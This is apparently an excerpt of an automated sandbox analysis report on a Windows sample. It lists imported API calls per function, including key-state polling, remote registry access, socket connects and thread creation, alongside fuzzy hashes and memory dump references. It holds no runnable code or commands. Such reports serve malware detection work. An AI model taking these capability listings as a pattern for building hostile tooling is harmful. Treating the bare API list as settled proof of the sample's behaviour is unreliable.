                                                • Instruction ID: a51b4434434e1a939649d2f7218713e41e5e8cde1c54ddb7d169a53aab9222a6
                                                • Opcode Fuzzy Hash: b35c8f2a7c58d5e9fcdd9eef56e6aa896e1a0dfc4c9ff1fdeb8c91f5428624b0
                                                • Instruction Fuzzy Hash: 8F616F35604204AFDB258F58C895FAA7BFAEF49300F1848D9E966A72E1C775E940CB10
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00AE1CB4
                                                • VariantClear.OLEAUT32(00000013), ref: 00AE1D26
                                                • VariantClear.OLEAUT32(00000000), ref: 00AE1D81
                                                • VariantClear.OLEAUT32(?), ref: 00AE1DF8
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AE1E26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType
                                                • String ID:
                                                • API String ID: 4136290138-0
                                                • Opcode ID: 5224afb686351b18ab65fa5ac16160291f5858709176c8dca46da3fb639b1ec1
                                                • Instruction ID: 9c717284480f2d3c6b0ad2580df4e1ae910b14fe6bcb71fe6cdfa50b72c3eb07
                                                • Opcode Fuzzy Hash: 5224afb686351b18ab65fa5ac16160291f5858709176c8dca46da3fb639b1ec1
                                                • Instruction Fuzzy Hash: 255148B5A00259EFDB24CF58C880AAAB7B8FF4C314B158559ED59DB301E730EA51CFA0
                                                APIs
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00B006EE
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B0077D
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B0079B
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00B007E1
                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 00B007FB
                                                  • Part of subcall function 00ABE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00AEA574,?,?,00000000,00000008), ref: 00ABE675
                                                  • Part of subcall function 00ABE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00AEA574,?,?,00000000,00000008), ref: 00ABE699
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                • String ID:
                                                • API String ID: 327935632-0
                                                • Opcode ID: 5c32f93c7c767de94478d97aec6269a7aadb21f42d15b8b8dbbd080f901aee01
                                                • Instruction ID: e3e64defa17a6034747ffc098f7c8504ece2b324fc02f54297002bc3f8d42bd1
                                                • Opcode Fuzzy Hash: 5c32f93c7c767de94478d97aec6269a7aadb21f42d15b8b8dbbd080f901aee01
                                                • Instruction Fuzzy Hash: 82511775A00205DFCB00EFA8C591AADBBF5FF49310F148095EA56AB392DB34ED46CB50
                                                APIs
                                                  • Part of subcall function 00B03C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B02BB5,?,?), ref: 00B03C1D
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B02EEF
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B02F2E
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B02F75
                                                • RegCloseKey.ADVAPI32(?,?), ref: 00B02FA1
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B02FAE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                • String ID:
                                                • API String ID: 3740051246-0
                                                • Opcode ID: 5465c1b166de6d7cf29e0a8e8f1834b11980ece8c2411c99c96ae86d7c56a697
                                                • Instruction ID: 4e783f19bacbb67b85ca21b30a264e5fe7bec440a419d41415d56811b7321f89
                                                • Opcode Fuzzy Hash: 5465c1b166de6d7cf29e0a8e8f1834b11980ece8c2411c99c96ae86d7c56a697
                                                • Instruction Fuzzy Hash: D3515571208305AFD704EB64C995E6BBBF8FF88314F00886DF596972A1DB31E909CB52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 55402f00f8a419176c7690df208995e448f8e4912a6808c8cc9ec415b7d52213
                                                • Instruction ID: f50b72ec24ea6dce0e65952ef74cd381ccd9f15080635fbca2be77d1e6474fe3
                                                • Opcode Fuzzy Hash: 55402f00f8a419176c7690df208995e448f8e4912a6808c8cc9ec415b7d52213
                                                • Instruction Fuzzy Hash: 30419279900205AFD720DF68CC98FA9BFE8EB09310F1543B5F959A72E1CB74AD41DA50
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AF12B4
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AF12DD
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AF131C
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AF1341
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AF1349
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: 72cc438f2eda6615dd87272eccfcd9395fe207b616525a6dd5a9fa9d14ae11f1
                                                • Instruction ID: 2023f804e8d7cef114d8dba67e692e50edc5dd89bc510bccdd5b38db1426f669
                                                • Opcode Fuzzy Hash: 72cc438f2eda6615dd87272eccfcd9395fe207b616525a6dd5a9fa9d14ae11f1
                                                • Instruction Fuzzy Hash: 5B41FC35600109DFDF05EF64CA81AAEBBF5FF49314B148099E906AB3A2DB31ED01DB61
                                                APIs
                                                • GetCursorPos.USER32(000000FF), ref: 00ABB64F
                                                • ScreenToClient.USER32(00000000,000000FF), ref: 00ABB66C
                                                • GetAsyncKeyState.USER32(00000001), ref: 00ABB691
                                                • GetAsyncKeyState.USER32(00000002), ref: 00ABB69F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: 6f013b81523bf3c955315b2f030d4972bb34a1f4c0da9098a695800aef815f19
                                                • Instruction ID: 9b5b2e5ca8face137b295d048482720906f3520f86126777b9785809be5bb523
                                                • Opcode Fuzzy Hash: 6f013b81523bf3c955315b2f030d4972bb34a1f4c0da9098a695800aef815f19
                                                • Instruction Fuzzy Hash: F4417F31504115FBCF159F64CC54AE9BBB4FB05324F20435AF869962D1CB70AE94DFA1
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00ADB369
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00ADB413
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ADB41B
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00ADB429
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ADB431
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: 3dc1e7d68b63c65ecdd2c85c39ca4bdcf26198b565f255d625c41fd5cc86528e
                                                • Instruction ID: f43e75a11c113b33be6453c05ab875a5937e6e7c321b583319b99c5380f0c7f0
                                                • Opcode Fuzzy Hash: 3dc1e7d68b63c65ecdd2c85c39ca4bdcf26198b565f255d625c41fd5cc86528e
                                                • Instruction Fuzzy Hash: B731DFB1900219EBEF14CF68DD4DADE3BB5EB04315F11422AF922AB2D1C7B4D915DBA0
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00ADDBD7
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ADDBF4
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ADDC2C
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ADDC52
                                                • _wcsstr.LIBCMT ref: 00ADDC5C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                • String ID:
                                                • API String ID: 3902887630-0
                                                • Opcode ID: 052ea4c25f5ddf0884fed6f60f0a3d8618513c53fa38d677684f873bb0514ac2
                                                • Instruction ID: d2591337f6c47ea846c30f15e282f54525b9991e302171ebddee53ca009bf6f2
                                                • Opcode Fuzzy Hash: 052ea4c25f5ddf0884fed6f60f0a3d8618513c53fa38d677684f873bb0514ac2
                                                • Instruction Fuzzy Hash: D4212672214200BFEB259F399D49E7B7BACEF45750F14403AF80ADA291EEA1DC41D6A0
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B0DEB0
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B0DED4
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B0DEEC
                                                • GetSystemMetrics.USER32(00000004), ref: 00B0DF14
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00AF3A1E,00000000), ref: 00B0DF32
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: 9aea05f2535ba16ef96cbdfb109fcbaa3304f6e1f3e21712b3d14cde0898c42b
                                                • Instruction ID: 46621a7a9dae0f4b378aeb2f5e61c2d0be36651b2dee6de1f079d2ba8529a55b
                                                • Opcode Fuzzy Hash: 9aea05f2535ba16ef96cbdfb109fcbaa3304f6e1f3e21712b3d14cde0898c42b
                                                • Instruction Fuzzy Hash: EA21A171611212AFCF205FB8DC84BAA3BD4FB15324F150764F92ACB5E0DB709851CB90
                                                APIs
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ADBC90
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ADBCC2
                                                • __itow.LIBCMT ref: 00ADBCDA
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ADBD00
                                                • __itow.LIBCMT ref: 00ADBD11
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: a62d14b3cf19268589bc26f0b8bd25944ac6bde25864938e9dfc129e2c3da357
                                                • Instruction ID: 87652aa8a983ed53174be9807fa2017ada84ed9bb9b7dda25b78eeb674821d0a
                                                • Opcode Fuzzy Hash: a62d14b3cf19268589bc26f0b8bd25944ac6bde25864938e9dfc129e2c3da357
                                                • Instruction Fuzzy Hash: CE21F935710208FADB21AB658D45FDE7A69EF4A710F11002AF946EB2C2DB74890587B1
                                                APIs
                                                  • Part of subcall function 00AA50E6: _wcsncpy.LIBCMT ref: 00AA50FA
                                                • GetFileAttributesW.KERNEL32(?,?,?,?,00AE60C3), ref: 00AE6369
                                                • GetLastError.KERNEL32(?,?,?,00AE60C3), ref: 00AE6374
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00AE60C3), ref: 00AE6388
                                                • _wcsrchr.LIBCMT ref: 00AE63AA
                                                  • Part of subcall function 00AE6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00AE60C3), ref: 00AE63E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                • String ID:
                                                • API String ID: 3633006590-0
                                                • Opcode ID: 66a39e1adf7a8a45ea2c110a18bfa7ce74eead5b1939bb3db5ac2fd844e17432
                                                • Instruction ID: d7d7a3d1f7b524c2d4608946af5a7264587358574fc8e5d32a4fdbecbbde76dc
                                                • Opcode Fuzzy Hash: 66a39e1adf7a8a45ea2c110a18bfa7ce74eead5b1939bb3db5ac2fd844e17432
                                                • Instruction Fuzzy Hash: 0D21E7315046569BDB25EB79AD42FEE33ACEF393E0F10086AF045DB0C1EF60D9858A54
                                                APIs
                                                  • Part of subcall function 00AFA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00AFA84E
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AF8BD3
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF8BE2
                                                • connect.WSOCK32(00000000,?,00000010), ref: 00AF8BFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorLastconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 3701255441-0
                                                • Opcode ID: 9cfdbbb0c99ade207c8d4f0c12d40aeddab9492459e33efea716f425d7343822
                                                • Instruction ID: 120b78db70111d00dd3d65818dd513725e718a88cd703b3efdba2fc75a91b833
                                                • Opcode Fuzzy Hash: 9cfdbbb0c99ade207c8d4f0c12d40aeddab9492459e33efea716f425d7343822
                                                • Instruction Fuzzy Hash: 492175312002149FDB10AF68CD45F7E77A9EF59760F044459FA56AB3D2CF78AC028751
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 00AF8441
                                                • GetForegroundWindow.USER32 ref: 00AF8458
                                                • GetDC.USER32(00000000), ref: 00AF8494
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00AF84A0
                                                • ReleaseDC.USER32(00000000,00000003), ref: 00AF84DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: edd2993314ec5e86e3868df3037574d8b15a9ba6bf53e7ffcf8bd9d6154caf96
                                                • Instruction ID: 339f5951eed3f9b011fdf108d62ac4f067ce7ac643cc4aa2cbc9a1b547c8e28d
                                                • Opcode Fuzzy Hash: edd2993314ec5e86e3868df3037574d8b15a9ba6bf53e7ffcf8bd9d6154caf96
                                                • Instruction Fuzzy Hash: 96218175A00204AFD710DFA5C989AAEBBF5EF48301F148479F95AA7251DF74EC05CB60
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ABAFE3
                                                • SelectObject.GDI32(?,00000000), ref: 00ABAFF2
                                                • BeginPath.GDI32(?), ref: 00ABB009
                                                • SelectObject.GDI32(?,00000000), ref: 00ABB033
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 0441dd87f4e7782e1f98941d39a9e869bb9d1f5067961993fa3ea2404f3eeb7a
                                                • Instruction ID: 9c136dccd44d53a2b56d322014928ce1334a4b889dd6c2f23e35d137e01f4864
                                                • Opcode Fuzzy Hash: 0441dd87f4e7782e1f98941d39a9e869bb9d1f5067961993fa3ea2404f3eeb7a
                                                • Instruction Fuzzy Hash: EB219074804205AFDB20EF68EC447EA7B7CFB10356F18461AF821930E1CBF48951DB50
                                                APIs
                                                • __calloc_crt.LIBCMT ref: 00AC21A9
                                                • CreateThread.KERNEL32(?,?,00AC22DF,00000000,?,?), ref: 00AC21ED
                                                • GetLastError.KERNEL32 ref: 00AC21F7
                                                • _free.LIBCMT ref: 00AC2200
                                                • __dosmaperr.LIBCMT ref: 00AC220B
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 2664167353-0
                                                • Opcode ID: 470dba095f958183da2082032e51f8a691ba274412ee232e2a0e547d534978f6
                                                • Instruction ID: fba4d9d9c8599eff9e89823bdbe280a1a8da3476b67f30238d1bdcc6aa1f7253
                                                • Opcode Fuzzy Hash: 470dba095f958183da2082032e51f8a691ba274412ee232e2a0e547d534978f6
                                                • Instruction Fuzzy Hash: 6811C832104306AF9B21AF65DD42FAF3798EF05770B16052DF91497151EB71D8118BA1
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ADABD7
                                                • GetLastError.KERNEL32(?,00ADA69F,?,?,?), ref: 00ADABE1
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00ADA69F,?,?,?), ref: 00ADABF0
                                                • HeapAlloc.KERNEL32(00000000,?,00ADA69F,?,?,?), ref: 00ADABF7
                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ADAC0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
